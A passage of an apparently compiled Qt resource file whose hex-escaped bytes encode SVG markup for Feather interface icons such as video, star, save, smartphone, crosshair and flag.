\x20\x79\x31\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x78\x32\x3d\x22\
\x39\x2e\x31\x37\x22\x20\x79\x32\x3d\x22\x31\x34\x2e\x38\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x49\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x69\x64\x65\x6f\
\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x32\x33\x20\x37\x20\x31\x36\x20\x31\x32\x20\x32\x33\
\x20\x31\x37\x20\x32\x33\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x67\x6f\x6e\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\
\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x35\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x05\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x75\x73\
\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x35\x22\x20\x79\
\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x39\x22\x20\x79\
\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x53\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x74\x61\x72\x22\
\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x31\x32\x20\x32\x20\x31\x35\x2e\x30\x39\x20\x38\x2e\x32\
\x36\x20\x32\x32\x20\x39\x2e\x32\x37\x20\x31\x37\x20\x31\x34\x2e\
\x31\x34\x20\x31\x38\x2e\x31\x38\x20\x32\x31\x2e\x30\x32\x20\x31\
\x32\x20\x31\x37\x2e\x37\x37\x20\x35\x2e\x38\x32\x20\x32\x31\x2e\
\x30\x32\x20\x37\x20\x31\x34\x2e\x31\x34\x20\x32\x20\x39\x2e\x32\
\x37\x20\x38\x2e\x39\x31\x20\x38\x2e\x32\x36\x20\x31\x32\x20\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x31\x33\
\x20\x31\x32\x20\x31\x38\x20\x31\x37\x20\x31\x33\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x36\x20\x31\
\x32\x20\x31\x31\x20\x31\x37\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6f\x63\x74\x61\x67\
\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\x32\x20\x31\x36\x2e\x31\
\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\x20\x31\
\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\x20\x32\x32\x20\x37\x2e\
\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\x2e\x31\x34\x20\x32\x20\
\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\x32\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x83\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\
\x30\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\
\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\
\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x88\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x61\x76\x65\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x32\x31\
\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x31\x31\x6c\x35\x20\x35\x76\x31\x31\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x31\x2d\x32\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x37\x20\x32\x31\x20\x31\x37\x20\x31\x33\x20\
\x37\x20\x31\x33\x20\x37\x20\x32\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x33\x20\x37\x20\x38\x20\
\x31\x35\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x37\x22\x20\x79\x31\x3d\x22\x31\x37\x22\x20\
\x78\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x37\x20\x31\x37\x20\x37\
\x20\x31\x37\x20\x31\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6b\x69\x70\x2d\
\x66\x6f\x72\x77\x61\x72\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x35\x20\x34\x20\x31\x35\
\x20\x31\x32\x20\x35\x20\x32\x30\x20\x35\x20\x34\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x39\x22\x20\x79\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\
\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x4c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6d\x61\x72\x74\
\x70\x68\x6f\x6e\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\
\x35\x22\x20\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\
\x31\x34\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\
\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb5\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x6f\x73\x73\
\x68\x61\x69\x72\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\
\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x32\x22\x20\x79\x31\x3d\x22\
\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x38\x22\x20\x79\x32\x3d\x22\
\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x32\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x4e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6c\x61\x67\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x34\x20\x31\x35\x73\
\x31\x2d\x31\x20\x34\x2d\x31\x20\x35\x20\x32\x20\x38\x20\x32\x20\
\x34\x2d\x31\x20\x34\x2d\x31\x56\x33\x73\x2d\x31\x20\x31\x2d\x34\
\x20\x31\x2d\x35\x2d\x32\x2d\x38\x2d\x32\x2d\x34\x20\x31\x2d\x34\
\x20\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x32\x32\x22\
\x20\x78\x32\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x61\x79\x65\x72\
